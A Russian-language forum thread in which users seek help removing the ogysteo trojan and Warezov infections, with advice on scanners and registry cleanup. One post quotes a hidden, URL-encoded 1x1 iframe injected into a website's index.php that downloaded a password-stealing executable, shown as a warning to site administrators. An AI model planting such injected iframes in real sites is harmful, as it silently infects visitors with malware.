-
Уважаемый посетитель!!!
Если Вы уже являетесь зарегистрированным участником проекта "миХей.ру - дискусcионный клуб",
пожалуйста, восстановите свой пароль самостоятельно, либо свяжитесь с администратором через Телеграм.
Tanya
Жюри КВМ
Для меня все началось с установки программы gmail.com, которая висела в трее и оповещала о новых письмах. После чего появился файл ogysteo.exe, который не давал запускаться никакой программе на компе, с горем пополам работал ie (и то закрывался периодически). Удалила в безопасном режиме этот exe и заодно программу gmail.com. Программы стали запускаться... но появилась куча других пакостей типа Daemonize и др.
В Local Settings\Temp постоянно появляются exe-файлы с цифровым названием (например, сейчас появился 1220054232.exe). Удаляю, а они появляются снова. Касперский (а до этого был Symantec) и программы типа Trojan remover и Ad-Aware за вирусы их не принимают. А тем временем эти exe очень мешают жить: постоянно слетают куки, сами отключаются картинки в ie, открываются окна ie и закрываются (иногда с рекламой). И вообще как-то не комфортно =)))
ZoneAlarm тоже не спасает.
Переставлять Windows неохота...
В Local Settings\Temp постоянно появляются exe-файлы с цифровым названием (например, сейчас появился 1220054232.exe). Удаляю, а они появляются снова. Касперский (а до этого был Symantec) и программы типа Trojan remover и Ad-Aware за вирусы их не принимают. А тем временем эти exe очень мешают жить: постоянно слетают куки, сами отключаются картинки в ie, открываются окна ie и закрываются (иногда с рекламой). И вообще как-то не комфортно =)))
ZoneAlarm тоже не спасает.
Переставлять Windows неохота...
Trotil
Команда "У.М."
http://www.kaspersky.ru/scanforvirus
Честно, точно не знаю,какую информацию выдает этот сканер, но попробуй закачать какой-нить файл с цифровым названием, а о результатах отпишись.
Честно, точно не знаю,какую информацию выдает этот сканер, но попробуй закачать какой-нить файл с цифровым названием, а о результатах отпишись.
P
PLATINUM
Гость
Tanya: "появился файл ogysteo.exe, который не давал запускаться никакой программе на компе, с горем пополам работал ie (и то закрывался периодически). Удалила в безопасном режиме этот exe и заодно программу gmail.com. Программы стали запускаться... но появилась куча других пакостей типа Daemonize и др.
В Local Settings\Temp постоянно появляются exe-файлы с цифровым названием (например, сейчас появился 1220054232.exe). Удаляю, а они появляются снова."
CHeL: "Ещё раз посоветую Dr.Web."
--------
У МЕНЯ СТОИТ Dr.Web.
Пользуюсь только им и уже давно.
С недавних пор возникла абсолютно таже проблема что и у Tanya.
Причем, др.Веб вообще не находит этого огюста, но иногда в темпах находит троянов. Огюста удаляю вручную, но постоянно все равно подгружаются новые вирусняки. Как найти этот доунлодер что их подкачивает??
Посоветуйте что-нибудь ещё =(
В Local Settings\Temp постоянно появляются exe-файлы с цифровым названием (например, сейчас появился 1220054232.exe). Удаляю, а они появляются снова."
CHeL: "Ещё раз посоветую Dr.Web."
--------
У МЕНЯ СТОИТ Dr.Web.
Пользуюсь только им и уже давно.
С недавних пор возникла абсолютно таже проблема что и у Tanya.
Причем, др.Веб вообще не находит этого огюста, но иногда в темпах находит троянов. Огюста удаляю вручную, но постоянно все равно подгружаются новые вирусняки. Как найти этот доунлодер что их подкачивает??
Посоветуйте что-нибудь ещё =(
Trotil
Команда "У.М."
Число тем по ogysteo с поисковиков увеличилось с 3 до 6, 
, но все равно там никакой конкретики, к сожалению, нет. Известные базы symanstec и касперского про него пока ничего не знают 
Видимо, вирус сравнительный новый. Можно самостоятельно обратиться в
http://forum.kaspersky.com/index.php?showtopic=23473
http://virusinfo.info/showthread.php?t=1235
В любом случае проделайте эти рекомендации и сообщите о результатах либо на указанные форумы, либо сюда.
, но все равно там никакой конкретики, к сожалению, нет. Известные базы symanstec и касперского про него пока ничего не знают Видимо, вирус сравнительный новый. Можно самостоятельно обратиться в http://forum.kaspersky.com/index.php?showtopic=23473
http://virusinfo.info/showthread.php?t=1235
В любом случае проделайте эти рекомендации и сообщите о результатах либо на указанные форумы, либо сюда.
Tanya
Жюри КВМ
У меня ogysteo опять появился, удалила ручками (и сохранила с цифровыми файлами, на всякий случай).
Нашла вот это (_http://virusinfo.prevx.com/pxparall.asp?PXC=da7e57040270). Пробую... по крайней мере цифровой файл, что был в temp программа поставила в карантин (и еще файлов 8, на которые прочие антивирусники никак не реагируют). Напишу какие будут результаты далее.
Теперь меня огорчает тот факт, что стал виснуть при загрузке Фотошоп... переустановка пока не помогла.
Нашла вот это (_http://virusinfo.prevx.com/pxparall.asp?PXC=da7e57040270). Пробую... по крайней мере цифровой файл, что был в temp программа поставила в карантин (и еще файлов 8, на которые прочие антивирусники никак не реагируют). Напишу какие будут результаты далее.
Теперь меня огорчает тот факт, что стал виснуть при загрузке Фотошоп... переустановка пока не помогла.
T
tjroot
Гость
ogysteo
Это новый троян!
Я его только что изоблечил и удалил от себя.....
сейчас я попробую Вам всем помочь......
Опишу подробно процесс удаления этого вредоносного ПО
Посвящается модераторам, администраторам сайтов, серверов….
Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://*********.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://****rver.com/counter1/load.exe/RLPack - как видите адрес указан в строке….
(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)
А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:
Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым
после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..
P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….
Скоро выйдет утилита для излечения от ogysteo…
Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot admin@programming-security.ru
Это новый троян!
Я его только что изоблечил и удалил от себя.....
сейчас я попробую Вам всем помочь......
Опишу подробно процесс удаления этого вредоносного ПО
Посвящается модераторам, администраторам сайтов, серверов….
Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://*********.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://****rver.com/counter1/load.exe/RLPack - как видите адрес указан в строке….
(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)
А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:
Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым
после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..
P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….
Скоро выйдет утилита для излечения от ogysteo…
Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot admin@programming-security.ru
Trotil
Команда "У.М."
tjroot
Спасибо за подробный отчет, но также рекомендую отписаться вот тут: http://virusinfo.info/forumdisplay.php?f=42
Это ведущий русскоязычный сайт по вредоносному ПО, и эта информация будет там совсем нелишней.
(хотя вы наверняка в курсе про этот сайт)
Добавлено: за темой по этому вирусу можно следить здесь.
Спасибо за подробный отчет, но также рекомендую отписаться вот тут: http://virusinfo.info/forumdisplay.php?f=42
Это ведущий русскоязычный сайт по вредоносному ПО, и эта информация будет там совсем нелишней.
(хотя вы наверняка в курсе про этот сайт)
Добавлено: за темой по этому вирусу можно следить здесь.
Л
Лис
Гость
проблема..подскажите
собственно проблема с виндоусом
комрады, очень прошу помощи
сначала у меня вылезает это окно
http://static.diary.ru/userdir/9/9/0/1/99015/13148887.jpg
и без разницы наживаю отправить, не отправить или вообще ничего не нажимаю
а потом сразу вот это
http://static.diary.ru/userdir/9/9/0/1/99015/13148911.jpg
у меня нервы сдают..я не знаю, что делать
пожалуйста, помогите
собственно проблема с виндоусом
комрады, очень прошу помощи
сначала у меня вылезает это окно
http://static.diary.ru/userdir/9/9/0/1/99015/13148887.jpg
и без разницы наживаю отправить, не отправить или вообще ничего не нажимаю
а потом сразу вот это
http://static.diary.ru/userdir/9/9/0/1/99015/13148911.jpg
у меня нервы сдают..я не знаю, что делать
пожалуйста, помогите
Trotil
Команда "У.М."
У вас на 99% - Warezov aka Limar aka Stration
Так как разновидностей у него на сегодняшний более десятка, подсказать, какие файлы являются/заражены вирусом я не могу.
Отправляю вас сюда: http://virusinfo.info/showthread.php?t=1235
Кстати, вирус - лидер за последнюю неделю. Следствие того, что многие пользователи не загружают обновлений операционной системы.
Вероятно используемые уязвимости:
http://www.securitylab.ru/vulnerability/271708.php
http://www.securitylab.ru/vulnerability/271329.php
(это означает, что даже при переустановке операционной системы без установки этих обновлений безопасности вероятность повторения проблемы достаточно высока.) А вообще с момента выхода SP2 вышло более 60 критических обновлений.
Так как разновидностей у него на сегодняшний более десятка, подсказать, какие файлы являются/заражены вирусом я не могу.
Отправляю вас сюда: http://virusinfo.info/showthread.php?t=1235
Кстати, вирус - лидер за последнюю неделю. Следствие того, что многие пользователи не загружают обновлений операционной системы.
Вероятно используемые уязвимости:
http://www.securitylab.ru/vulnerability/271708.php
http://www.securitylab.ru/vulnerability/271329.php
(это означает, что даже при переустановке операционной системы без установки этих обновлений безопасности вероятность повторения проблемы достаточно высока.) А вообще с момента выхода SP2 вышло более 60 критических обновлений.
N
n0th1ng
Гость
Лис тут фишка есть....cmd -> shutdown -a
далее ставим NoD32 и OutPost(firewall)
кстати у меня хорошо ужились....)Сканим камп и удаляем из папки винды какой то фаил...у мя на avaste определял Win32:SD+Ad[trj] ну что-то чипо того....и help warezov доканал и ещё какой то в придачу....варез при включении инета начинает письма слать..а другой на 100%загружает систему
далее ставим NoD32 и OutPost(firewall)
кстати у меня хорошо ужились....)Сканим камп и удаляем из папки винды какой то фаил...у мя на avaste определял Win32:SD+Ad[trj] ну что-то чипо того....и help warezov доканал и ещё какой то в придачу....варез при включении инета начинает письма слать..а другой на 100%загружает систему
Trotil
Команда "У.М."
Yummy*
Участник
Вот я недавно сканировала свой комп, несколько вирусов нашлись и удалились. А с одним ничего нельзя - ни вылечить, ни удалить. Сказано, что он в оперативной памяти. Это как?
Как избавиться? Антивирус у меня нод 32.
P.S. Этот вирус вроде жить особо не мешает... Но все же, не хочу жить с вирусом в оперативке
Как избавиться? Антивирус у меня нод 32.P.S. Этот вирус вроде жить особо не мешает... Но все же, не хочу жить с вирусом в оперативке
Похожие темы
